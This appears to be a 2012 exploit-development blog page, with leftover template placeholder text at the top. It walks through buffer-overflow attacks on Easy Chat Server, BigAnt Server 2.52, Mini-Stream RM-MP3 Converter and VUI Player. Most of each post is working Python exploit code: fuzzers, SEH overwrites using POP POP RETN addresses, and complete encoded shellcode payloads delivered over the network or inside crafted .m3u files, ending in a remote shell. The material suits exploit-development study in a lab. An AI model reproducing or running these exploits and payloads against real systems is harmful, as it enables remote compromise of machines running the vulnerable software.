This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Wednesday, February 22, 2012

SEH Stack Based Overflow in Easy Chat Application




First start Easy Chat Server

In the client we can access easy chat by using browser type the IP of Easy Chat Server : 192.168.56.101
Then try to enter the room chat by typing username and password
username : admin
password : admin

Now, we have entered chat room

To know process happen, we use wireshack capturing process happening in the network. Start wireshack, then choose the device (because we use Windows in Virtual Box for our server, we use vbnet0.).

We can see that username and password have been sent using GET method. To know more detail process, right click in the process row do you want to know further, then click “Follow TCP Stream” and we can see how username and password sent.

We can use it in our fuzzer to sent many characters causing the application crash. Now let's create the fuzzer

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ipaddr = "192.168.56.101"
tport = 80
buffer = "\x41" * 20000
getsend ="GET /body.ghp?username="+buffer+"&password="+buffer+"&room=4 HTTP/1.1\r\n\""
getsend+="Host:192.168.56.101"
getsend += "\r\n\r\n"
s.connect((ipaddr,tport))
s.send(getsend)
s.close()

Save it with easychat.py, then run it by typing python easychat.py
But the application still running normarly. So, we have to change the fuzzer. Let's try to send username and password via chat.ghp. We can knoe it via address bar in the browser when entering the room.

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ipaddr = "192.168.56.101"
tport = 80
buffer = "\x41" * 20000
getsend ="GET /body.ghp?username="+buffer+"&password="+buffer+"&room=4 HTTP/1.1\r\n\""
getsend+="Host:192.168.56.101"
getsend += "\r\n\r\n"
s.connect((ipaddr,tport))
s.send(getsend)
s.close()

Save it with easychat.py, then run it by typing python easychat.py
But the application still running normarly. So, we have to change the fuzzer. Let's try to send username and password via chat.ghp. We can know it via address bar in the browser when entering the room.

So, the fuzzer become

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ipaddr = "192.168.56.101"
tport = 80
buffer = "\x41" * 20000
getsend ="GET /chat.ghp?username="+buffer+"&password="+buffer+"&room=4 HTTP/1.1\r\n\""
getsend+="Host:192.168.56.101"
getsend += "\r\n\r\n"
s.connect((ipaddr,tport))
s.send(getsend)
s.close()

Ok, we are success to make it chash. Let's analyze it with ollydbg




From the Ollydbg, we knoe that we can overwrite SEH. Now let's analyze in which number of characters SEH is overwritten.
Type : # /pentest/exploits/framework/tools/pattern_create.rb 20000
Then copy the string generated to fuzzer...

/pentest/exploits/framework/tools/pattern_offset.rb 68413368

Now, change the fuzzer to make sure we can overwrite EIP

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ipaddr = "192.168.56.101"
tport = 80
buffer = "\x41" * 216
buffer += "\xCC\xCC\xCC\xCC" 
buffer += "\xEF\xBE\xAD\xDE"
buffer += "\x41" * (20000 - len(buffer))
getsend ="GET /chat.ghp?username="+buffer+"&password="+buffer+"&room=4 HTTP/1.1\r\n\""
getsend+="Host:192.168.56.101"
getsend += "\r\n\r\n"
s.connect((ipaddr,tport))
s.send(getsend)
s.close()

Let's try it


Ok, now, we can overwrite EIP successfully
Next let's search the address not containing SafeSEH and DllCharacteristic.
After analyzing application modules one by one, we have found that SSLEAY32.dll is free from them.
Now, let's search POP POP RETN address. Click at the dll, ctrl+S. write POP r32 POP r32 RETN

Click Find, we can see the POP POP RETN address
Now, let's change the fuzzer

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ipaddr = "192.168.56.101"
tport = 80
buffer = "\x41" * 216
buffer += "\xCC\xCC\xCC\xCC" 
buffer += "\xBA\x22\x00\x10"
buffer += "\x41" * (20000 - len(buffer))
getsend ="GET /chat.ghp?username="+buffer+"&password="+buffer+"&room=4 HTTP/1.1\r\n\""
getsend+="Host:192.168.56.101"
getsend += "\r\n\r\n"
s.connect((ipaddr,tport))
s.send(getsend)
s.close()

Run the fuzzer..
But nothing happen. I suggest because it contain character "00" - "\x00". Bow let's scroll the module adress after we pass address 1000xxxx

Then search POP POP RET address

Let's change the fuzzer

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ipaddr = "192.168.56.101"
tport = 80
buffer = "\x41" * 216
buffer += "\xCC\xCC\xCC\xCC" 
buffer += "\x66\x89\x01\x10"
buffer += "\x41" * (20000 - len(buffer))
getsend ="GET /chat.ghp?username="+buffer+"&password="+buffer+"&room=4 HTTP/1.1\r\n\""
getsend+="Host:192.168.56.101"
getsend += "\r\n\r\n"
s.connect((ipaddr,tport))
s.send(getsend)
s.close()

Let's try it again
Ok, we can use address to overwrite EIP, then analyzing the space to save shellcode
To do that right-click 013E6DDC - Follow in Dump - Selection
We have big enough memory address 013E6DE4 s.d. 013EF33C
Next, let's create payload.

Let' change fuzzer into
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ipaddr = "192.168.56.101"
tport = 80
buffer = "\x90" * 216
buffer += "\xEB\x06\x90\x90"
buffer += "\x99\x88\x01\x10"
buffer += "\x90" * 16
buffer += ("\xda\xc3\xbe\x34\x1d\x0e\x80\x2b\xc9\xb1\x51\xd9\x74\x24\xf4\x5b"
"\x31\x73\x17\x03\x73\x17\x83\xf7\x19\xec\x75\x0b\x4b\x1b\x38\x1b"
"\x75\x24\x3c\x24\xe6\x50\xaf\xfe\xc3\xed\x75\xc2\x80\x8e\x70\x42"
"\x96\x81\xf0\xfd\x80\xd6\x58\x21\xb0\x03\x2f\xaa\x86\x58\xb1\x42"
"\xd7\x9e\x2b\x36\x9c\xdf\x38\x41\x5c\x15\xcd\x4c\x9c\x41\x3a\x75"
"\x74\xb2\xeb\xfc\x91\x31\xb4\xda\x58\xad\x2d\xa9\x57\x7a\x39\xf2"
"\x7b\x7d\xd6\x0f\xa8\xf6\xa1\x63\x94\x14\xd3\xb8\xe5\xff\x77\xb5"
"\x45\x30\xf3\x89\x45\xbb\x73\x15\xfb\x30\x33\x2d\x5d\x2f\x3a\x63"
"\x6f\x43\x12\x84\xb9\xfd\xc0\x1c\x2e\x31\xd5\x88\xd9\x46\x2b\x17"
"\x72\x56\x9b\xcf\xb1\x45\xe0\x34\x16\x69\xcf\x15\x1f\x70\x96\x28"
"\xf2\x73\x55\x7f\x67\x86\xa6\xaf\x1f\x5f\x51\xba\x4d\x08\x9d\x92"
"\xdd\xe4\x32\x49\xb1\x49\xe6\x2e\x66\xb1\xd8\xd6\xe0\x5c\x85\x70"
"\xa2\xd7\xd4\xe9\x2c\x4c\x0c\x61\x6a\xdb\xce\x57\x1e\xf4\x61\x02"
"\x20\x24\xe9\x08\x73\xeb\x03\x07\x73\x22\x80\xf2\x74\x1b\x4f\x19"
"\xc3\x1a\xd9\xb6\x2b\xf4\x8a\x6c\x80\xac\xd5\x5c\xbb\x27\xcd\x25"
"\x7a\xce\x46\x2a\x54\x64\x96\x04\x3f\xed\x0c\xc2\xa8\x92\xa1\x83"
"\xcc\x3f\x6a\xca\x27\x0c\x03\x0b\x5d\xc8\x9d\x31\x93\x10\x6e\x1f"
"\x2a\xd2\xbc\xa1\x91\xff\x2d\xd0\x6c\x38\xf9\x41\x3b\x50\x8f\x6b"
"\x8f\xb7\x90\xe6\xb4\x48\xb8\x53\x62\xe5\x14\x32\xdd\x63\x96\xe5"
"\x8c\x26\xc9\xfa\xff\xa1\x44\xdd\x05\xfc\xc4\x22\xd3\x6a\x14\x23"
"\xeb\x95\x3a\x50\x43\x96\x38\xa2\x08\x99\xe9\x78\x2e\xb5\x7e\x02"
"\x08\xd4\x0c\xa9\x57\xcf\x0c\x9d")
buffer += "\x90" * (20000 - len(buffer))
getsend ="GET /chat.ghp?username="+buffer+"&password="+buffer+"&room=4 HTTP/1.1\r\n\""
getsend+="Host:192.168.56.101"
getsend += "\r\n\r\n"
s.connect((ipaddr,tport))
s.send(getsend)
s.close()


Run it



Friday, February 17, 2012

SEH Based Overflow - Exploitation in Application with SEH Handler and Safe SEH Big ANT 2.52

In the previous article we have tried to do exploitation buffer overflow direct return. Now, we are going to try to exploit application with SEH and Safe SEH. Before we do it, we need to install the application – Big Ant Server v2.52.
1. Creating Fuzzer
Now let's create fuzzer like the one to exploit WarFTP in three previous article.
----------------------------------------------
import socket
ipaddr = "192.168.56.101"
tport = 6660
buffer = "USV " + "\x41" * 2500 + "\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((ipaddr, tport))
#data = s.recv(1024)
s.send(buffer )
s.close()
----------------------------------------------
2. Trying to fuzz BigAnt Server
Ok run BigAnt Server attached with Ollydbg in Windows Application, then run the fuzzer.

We can see that application become crash, but EIP is not overwritten directly because SEH handler. To view that, click View – SEH chain.

Press shift+F9 to continue the process and EIP become 414141.


In the right corner of Ollydbg can be viewed that fuzzer input have been enter the stack, to view that right-click at the stack – Follow in Dump

3. Looking for Module Free from SEH handler and SafeSEH
There are some methods to pass SEH handler, one of them is POP POP RETN method. But, sometime in some application there are Safe SEH making memory address tables containing SEH address. To pass that we will search an address used as stepped stone in overwriting SEH from module or file not compiled with safeSEH and IMAGE_DLLCHARATERISTICS_NO_SEH.
The next step is searching the address, in this case we find that vbajet32.dll is not contain safe SEH. To prove that, copy vbajet32.dll into Backtrack system, the scan that using msfpescan.
Write # /pentest/exploits/framework/msfpescan -i /tmp/vbajet32.dll | grep SEHandler to check this module do not contain SEHandler and # /pentest/exploits/framework/msfpescan -i  /tmp/vbajet32.dll | grep DllCharacteristics to make sure that it is free from DllCharacteristics (0x0400, 0x0500, 0x0600, 0x0700, 0x0C00, 0x0E00, 0x0F00)

4. Looking for POP POP RETN location
The next step is looking for POP POP RETN location, open BigAnt Server attached with Ollydbg. Click View - Executable Module - Vbajet32.dll, Ctrl + S, then write POP r32 POP r32 RETN.
We will se the addres of POP POP RETN
5. Searching offset to overwrite SEH
In this step we will search in which number of byte SEH is overwritten.
Let's make fuzzer script containing 2500 pattern character created by pattern_create.rb.
# /pentest/exploits/framework/tools/pattern_create.rb 2500

Change the fuzzer script become :
import socket
ipaddr = "192.168.56.101"
tport = 6660
#buffer = "USV " + "\x41" * 2500 + "\r\n\r\n"
buffer = "USV "
buffer += "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab...."
buffer += "\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((ipaddr, tport))
#data = s.recv(1024)
s.send(buffer )
s.close()

Check in what number EIP is overwritten..
# /pentest/exploits/framework/tools/pattern_offset.rb 42326742

Let's make sure the EIP can be  overwritten
Change the fuzzer script become :
import socket
ipaddr = "192.168.56.101"
tport = 6660
buffer = "USV "
buffer += "\x90" * 962
buffer += "\xCC\xCC\xCC\xCC"
buffer += "\xEF\xBE\xAD\xDE"
buffer += "\x90" * (2500 - len(buffer))
buffer += "\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((ipaddr, tport))
s.send(buffer )
s.close()

Restart and run BigAnt attached with Ollydbg, run the fuzzer.., then let's see what happen with EIP

Look, EIP is overwritten with DEADBEEF as the character sent, so we are success and let's move to the next step.

6. Controlling CPU Process
After get EIP overwritten position, let's try to test it..
Remove DEAFBEEF with the real address EIP overwritten, so the fuzzer script become...
import socket
ipaddr = "192.168.56.101"
tport = 6660
buffer = "USV "
buffer += "\x90" * 962
buffer += "\xCC\xCC\xCC\xCC"
buffer += "\x6A\x19\x9A\x0F"
buffer += "\x90" * (2500 - len(buffer))
buffer += "\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((ipaddr, tport))
s.send(buffer )
s.close()
Before we run the fuzzer, restart and run BigAnt again, attach it with Ollydbg, then breakpoint the POP POP RETN process with press F2 at the process.
Now, run the script, press shift + F9, Look we are success to overwrite EIP with POP POP RETN address...
Press F7 to continue the process
We have seen that we are pass the two next process of POP POP RETN. Now, after we press F7 once again, we are brought into stack location.
But, the problem is the stack space is only 4 byte. Offcourse, it is not enough to a shellcode, so we need to move it into the bigger one. To search the bigger one, right click at the first memory address \xCC (014FFD7C).

We have found that the next four byte i.e 014FFD84 (014FFD84 - 014FFF7F = 4), have enough space to save our shellcode
 8. Creating Shellcode
----------------------------------------------
import socket
ipaddr = "192.168.56.101"
tport = 6660
buffer = "USV "
buffer += "\x90" * 962
buffer += "\xEB\x06\x90\x90"
buffer += "\x6A\x19\x9A\x0F"
buffer += "\x90" * 32
buffer += ("\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3d"
"\x6f\x4c\x7b\x83\xeb\xfc\xe2\xf4\xc1\x05\xa7\x36\xd5\x96\xb3\x84"
"\xc2\x0f\xc7\x17\x19\x4b\xc7\x3e\x01\xe4\x30\x7e\x45\x6e\xa3\xf0"
"\x72\x77\xc7\x24\x1d\x6e\xa7\x32\xb6\x5b\xc7\x7a\xd3\x5e\x8c\xe2"
"\x91\xeb\x8c\x0f\x3a\xae\x86\x76\x3c\xad\xa7\x8f\x06\x3b\x68\x53"
"\x48\x8a\xc7\x24\x19\x6e\xa7\x1d\xb6\x63\x07\xf0\x62\x73\x4d\x90"
"\x3e\x43\xc7\xf2\x51\x4b\x50\x1a\xfe\x5e\x97\x1f\xb6\x2c\x7c\xf0"
"\x7d\x63\xc7\x0b\x21\xc2\xc7\x3b\x35\x31\x24\xf5\x73\x61\xa0\x2b"
"\xc2\xb9\x2a\x28\x5b\x07\x7f\x49\x55\x18\x3f\x49\x62\x3b\xb3\xab"
"\x55\xa4\xa1\x87\x06\x3f\xb3\xad\x62\xe6\xa9\x1d\xbc\x82\x44\x79"
"\x68\x05\x4e\x84\xed\x07\x95\x72\xc8\xc2\x1b\x84\xeb\x3c\x1f\x28"
"\x6e\x3c\x0f\x28\x7e\x3c\xb3\xab\x5b\x07\x5d\x27\x5b\x3c\xc5\x9a"
"\xa8\x07\xe8\x61\x4d\xa8\x1b\x84\xeb\x05\x5c\x2a\x68\x90\x9c\x13"
"\x99\xc2\x62\x92\x6a\x90\x9a\x28\x68\x90\x9c\x13\xd8\x26\xca\x32"
"\x6a\x90\x9a\x2b\x69\x3b\x19\x84\xed\xfc\x24\x9c\x44\xa9\x35\x2c"
"\xc2\xb9\x19\x84\xed\x09\x26\x1f\x5b\x07\x2f\x16\xb4\x8a\x26\x2b"
"\x64\x46\x80\xf2\xda\x05\x08\xf2\xdf\x5e\x8c\x88\x97\x91\x0e\x56"
"\xc3\x2d\x60\xe8\xb0\x15\x74\xd0\x96\xc4\x24\x09\xc3\xdc\x5a\x84"
"\x48\x2b\xb3\xad\x66\x38\x1e\x2a\x6c\x3e\x26\x7a\x6c\x3e\x19\x2a"
"\xc2\xbf\x24\xd6\xe4\x6a\x82\x28\xc2\xb9\x26\x84\xc2\x58\xb3\xab"
"\xb6\x38\xb0\xf8\xf9\x0b\xb3\xad\x6f\x90\x9c\x13\x43\xb7\xae\x08"
"\x6e\x90\x9a\x84\xed\x6f\x4c\x7b")
buffer += "\x90" * (2500 - len(buffer))
buffer += "\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((ipaddr, tport))
s.send(buffer )
s.close()
----------------------------------------------

Tuesday, February 14, 2012

Analyzing How to Create Fuzzer to Exploit Buffervlow Vulnerability in Ministream RM-MP3 Application

In the two previous article we have learned Exploitation via Buffer Overflow Vulnerability - Stack Based Overflow (Case Study: Buffer Overflow in Mini Stream RM MP3 Converter).

In this article we will explain how we get the fuzzer code.

To make a fuzzer, we will create file containing many characters to make Mini Stream crash
-----------------------------------------------------------------
    buffer += "\x41" * 20000;
    filename = "bikinkacau" + ".m3u";
    file = open(filename,"w")
    file.writelines(buffer)
    file.close()
-----------------------------------------------------------------

Then, load this file using Mini Stream, and the error code:-71 appeared. It's also happen when we load any file that is not appropriate with the application format.

Let's try to open original file .m3u
 Ok, the file is opened successfully, then let's see the content of the file.
 Next, let's add pattern character created by pattern_create.rb after the end of the content 

The content of the file become :
Next, load TV.m3u having been modified with Mini Stream application and the application is closed suddenly. That means we were succcess to make a fuzzer to make the application crash.

Now, we will analyze in which number of character the EIP is overwritten by attach Mini Stream with Ollydbg, then load TV.m3u.

We will se the EIP is overwritten..


 et's analyze in what number of input, the EIP and ESP have been overwritten. We can use pattern_offset to do that.
EIP  : #/pentest/exploits/framework/tools/pattern_offset.rb 69573469 20000
ESP : #/pentest/exploits/framework/tools/pattern_offset.rb 69573469 20000


Trying to Expoit VUI Player Via Buffer Overflow Vulnerability

First I try to create fuzzer

buffer += "\x41" * 1500;
filename = "vui" + ".m3u";
file = open(filename,"w")
file.writelines(buffer)
file.close()

I save it with fuzzvui.py, run with python, it work well to make VUI Player crash..

Then I try to make pattern character with pattern create, and replace the buffer with it, and try to analyze in what number of character EIP is overwritten with pattern offset, after that I make sure the EIP is overwritten, by changing the fuzzer script.

----------------------------
buffer = "\x90" * 1012
buffer += "\xD7\x30\x9D\x7C"
buffer += ("\xd9\xd0\xd9\x74\x24\xf4\xb8\xea\x72\xcc\xd2\x5b\x31\xc9\xb1\x51"
"\x31\x43\x17\x03\x43\x17\x83\x01\x8e\x2e\x27\x29\x05\x44\x85\x39"
"\x23\x65\xe9\x46\xb4\x11\x7a\x9c\x11\xad\xc6\xe0\xd2\xcd\xcd\x60"
"\xe4\xc2\x45\xdf\xfe\x97\x05\xff\xff\x4c\xf0\x74\xcb\x19\x02\x64"
"\x05\xde\x9c\xd4\xe2\x1e\xea\x23\x2a\x54\x1e\x2a\x6e\x82\xd5\x17"
"\x3a\x71\x3e\x12\x27\xf2\x61\xf8\xa6\xee\xf8\x8b\xa5\xbb\x8f\xd4"
"\xa9\x3a\x7b\xe9\xfd\xb7\xf2\x81\xd9\xdb\x65\x9a\x13\x3f\x01\x97"
"\x17\x8f\x41\xe7\x9b\x64\x25\xfb\x0e\xf1\x86\x0b\x0f\x6e\x89\x45"
"\xa1\x82\xc5\xa6\x6b\x3c\xb5\x3e\xfc\xf2\x0b\xd6\x8b\x87\x59\x79"
"\x20\x97\x4e\xed\x03\x8a\x93\xd6\xc3\xaa\xba\x77\x6d\xb1\x25\x06"
"\x80\x32\xa8\x5d\x31\x41\x53\x8d\xad\x9c\xa2\xd8\x83\x48\x4a\xf4"
"\x8f\x25\xe7\xab\x7c\x89\x54\x08\xd0\xf2\x8b\xe8\xbe\x1d\x70\x92"
"\x6d\x97\x69\xcf\xfa\x03\x73\x9f\x3d\x1c\x7b\x89\xa8\xb3\xd2\x60"
"\xd2\x64\xbc\x2e\x81\xab\xd4\x79\x25\x65\x75\xd0\x26\x5a\x12\x3f"
"\x91\xdd\xaa\xe8\xdd\x34\x7c\x42\x76\xec\x82\xba\xe5\x66\x9a\x43"
"\xcc\x0e\x33\x4c\x06\xa5\x44\x62\xc1\x2c\xdf\xe4\x66\xd2\x72\x61"
"\x93\x7e\xdd\x28\x75\xb3\x54\x2d\xef\x0f\xee\x53\xc1\x4f\x03\x39"
"\xdc\x12\xc9\xc3\x63\xbf\x82\xb6\x1e\x87\x0f\x63\x75\x9f\x3d\x8d"
"\x39\x76\x3d\x04\x7a\x88\x17\xbd\xd5\x24\xc9\x10\x8b\xa2\xe8\xc3"
"\x7a\x66\xba\x1c\xac\xe0\x91\x3b\x48\x3f\xba\x44\x85\xd5\xc2\x45"
"\x1d\xd5\xed\x32\x35\xd5\x8d\x80\xde\xda\x44\x5a\xe0\xf5\x01\x24"
"\xc6\x14\xa2\x8b\x09\x0e\xba\xfb")
filename = "vuiploit2" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
----------------------------

I run it, and load file .m3u with VUI attached with Ollydbg. It's work

 But if I change the fuzzer script to create m3u file to exploit the Windows via VUI, it's not work..
 ...

Ok, Let's analyze the memory address..

Let's change fuzzer script into :
...........................
buffer = "\x90" * 900
buffer += "\x90" * 20
buffer += "\x90" * 30
buffer += "\x41" * 20
buffer += "\x42" * 32
buffer += "\xD7\x30\x9D\x7C"
buffer += "\xCC" * 300
filename = "vuimem" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
...........................

To know what happen with EIP when we try to overwrite it with JMP ESP address..


Let's try again with breakpoint in JMP ESP address

The same thing happen, breakpoint not work..
Let's change fuzzer script again

.......................................
buffer = "\x90" * 900
buffer += "\x90" * 20
buffer += "\x90" * 30
buffer += "\x41" * 20
buffer += "\x42" * 32
buffer += "\xD7\x30\x9D\x7C"
buffer += "\x41" * 300
filename = "vuimem" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
.......................................
And set the breakpoint
.Unfortunately the breakpoint not work...

Change fuzzer scrip again. We try to add space between EIP addres and stack ...

.......................................
buffer = "\x90" * 1012
buffer += "\xD7\x30\x9D\x7C"
buffer += "\x41" * 300
filename = "vuimem" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
.......................................
We also set breakpoint in JMP ESP memory address

.......................................
buffer = "\x90" * 1012
buffer += "\xD7\x30\x9D\x7C"
buffer += "\x90" * 32
buffer += "\xCC" * 32
filename = "vuimem" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
.......................................


OK, it's work whe we try to add space "\x90" - NOP (No Operation) between EIP and stack.

So, let's try it with opcode metsploit to exploit Windows OD (the detail step to create it is in the previous article)

.......................................
buffer = "\x90" * 1012
buffer += "\xD7\x30\x9D\x7C"
buffer += "\x90" * 32
buffer += ("\xd9\xd0\xd9\x74\x24\xf4\xb8\xea\x72\xcc\xd2\x5b\x31\xc9\xb1\x51"
"\x31\x43\x17\x03\x43\x17\x83\x01\x8e\x2e\x27\x29\x05\x44\x85\x39"
"\x23\x65\xe9\x46\xb4\x11\x7a\x9c\x11\xad\xc6\xe0\xd2\xcd\xcd\x60"
"\xe4\xc2\x45\xdf\xfe\x97\x05\xff\xff\x4c\xf0\x74\xcb\x19\x02\x64"
"\x05\xde\x9c\xd4\xe2\x1e\xea\x23\x2a\x54\x1e\x2a\x6e\x82\xd5\x17"
"\x3a\x71\x3e\x12\x27\xf2\x61\xf8\xa6\xee\xf8\x8b\xa5\xbb\x8f\xd4"
"\xa9\x3a\x7b\xe9\xfd\xb7\xf2\x81\xd9\xdb\x65\x9a\x13\x3f\x01\x97"
"\x17\x8f\x41\xe7\x9b\x64\x25\xfb\x0e\xf1\x86\x0b\x0f\x6e\x89\x45"
"\xa1\x82\xc5\xa6\x6b\x3c\xb5\x3e\xfc\xf2\x0b\xd6\x8b\x87\x59\x79"
"\x20\x97\x4e\xed\x03\x8a\x93\xd6\xc3\xaa\xba\x77\x6d\xb1\x25\x06"
"\x80\x32\xa8\x5d\x31\x41\x53\x8d\xad\x9c\xa2\xd8\x83\x48\x4a\xf4"
"\x8f\x25\xe7\xab\x7c\x89\x54\x08\xd0\xf2\x8b\xe8\xbe\x1d\x70\x92"
"\x6d\x97\x69\xcf\xfa\x03\x73\x9f\x3d\x1c\x7b\x89\xa8\xb3\xd2\x60"
"\xd2\x64\xbc\x2e\x81\xab\xd4\x79\x25\x65\x75\xd0\x26\x5a\x12\x3f"
"\x91\xdd\xaa\xe8\xdd\x34\x7c\x42\x76\xec\x82\xba\xe5\x66\x9a\x43"
"\xcc\x0e\x33\x4c\x06\xa5\x44\x62\xc1\x2c\xdf\xe4\x66\xd2\x72\x61"
"\x93\x7e\xdd\x28\x75\xb3\x54\x2d\xef\x0f\xee\x53\xc1\x4f\x03\x39"
"\xdc\x12\xc9\xc3\x63\xbf\x82\xb6\x1e\x87\x0f\x63\x75\x9f\x3d\x8d"
"\x39\x76\x3d\x04\x7a\x88\x17\xbd\xd5\x24\xc9\x10\x8b\xa2\xe8\xc3"
"\x7a\x66\xba\x1c\xac\xe0\x91\x3b\x48\x3f\xba\x44\x85\xd5\xc2\x45"
"\x1d\xd5\xed\x32\x35\xd5\x8d\x80\xde\xda\x44\x5a\xe0\xf5\x01\x24"
"\xc6\x14\xa2\x8b\x09\x0e\xba\xfb")
filename = "vuiploit" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
.......................................

Now, let's try open vuiploit.m3u created by the fuzzer in VUI Player.

Then, we try to telnet the target ...

Ok, we have done it successfully ...